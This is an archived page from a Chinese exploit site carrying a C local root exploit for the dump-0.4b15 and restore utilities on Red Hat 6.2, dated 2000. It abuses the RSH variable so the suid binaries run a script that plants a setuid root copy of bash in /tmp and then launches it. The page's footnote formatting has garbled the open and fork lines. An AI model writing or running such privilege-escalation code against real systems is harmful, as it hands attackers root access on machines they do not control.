首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

dump 0.4b15 exploit (Redhat 6.2)


http://www.gipsky.com/
/*

**

** dump-0.4b15x.c

**

** dump-0.4b15 exploit:

** Redhat 6.2 dump command executes

** external program with suid priviledge.

**

** affected:

** /sbin/dump

** /sbin/dump.static

** /sbin/restore

** /sbin/restore.static

**

** Bug found by mat@hacksware.com

**

** This example was coded by md0claes@mdstud.chalmers.se

** It was written for EDUCATIONAL PURPOSES ONLY.

**

**

*/



#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>



#define RUNME "/tmp/runme" /* tmp file */

#define SUID_PATH "/tmp/superdude" /* the power of root */



void usage(char *pname)

{

fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);

fprintf(stdout, " d - exploit /sbin/dump\n");

fprintf(stdout, " s - exploit /sbin/dump.static\n");

fprintf(stdout, " r - exploit /sbin/restore\n");

fprintf(stdout, " p - exploit /sbin/restore.static\n\n");

}



int main(int argc, char *argv[], char *envp[])

{

int fd;

pid_t pid;

char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };

char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "

SUID_PATH "\nchmod 6755 " SUID_PATH };



char *suid[] = { SUID_PATH, NULL };

char *av[] = { "/sbin/restore.static", "restore.static",

"-t", "/tmp/foo" };



if (argc != 2) {

usage(argv[0]);

exit(1);

}



switch(tolower(argv[1][0])) {



case 'd':

av[0] = "/sbin/dump";

av[1] = "dump";

av[2] = "-0";

av[3] = "/";

break;



case 's':

av[0] = "/sbin/dump.static";

av[1] = "dump.static";

av[2] = "-0";

av[3] = "/";

break;



case 'r':

av[0] = "/sbin/restore";

av[1] = "restore";

break;



case 'p':

break;



default:

usage(argv[0]);

exit(1);

}



if [1] == -1) {

perror("fopen");

exit(1);

}



if (write(fd, runbuf, sizeof(runbuf)) == -1) {

perror("write");

exit(1);

}

close(fd);



if [2] < 0) {

perror("fork");

exit(1);

}



else if (pid == 0) {

if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {

perror("execle");

_exit(1);

}

}



sleep(1);

unlink(RUNME);

fprintf(stdout, "\nExploited %s \n", av[0]);

fprintf(stdout, "Running " SUID_PATH "\n");

execve(SUID_PATH, suid, envp);



exit(0);

}

[2000-11-29]
附注
  1. fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755
  2. pid = fork(
<< rpc Suid Privledge Exploit BSDi 3.0 inc Local Root Buffer Overflow Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号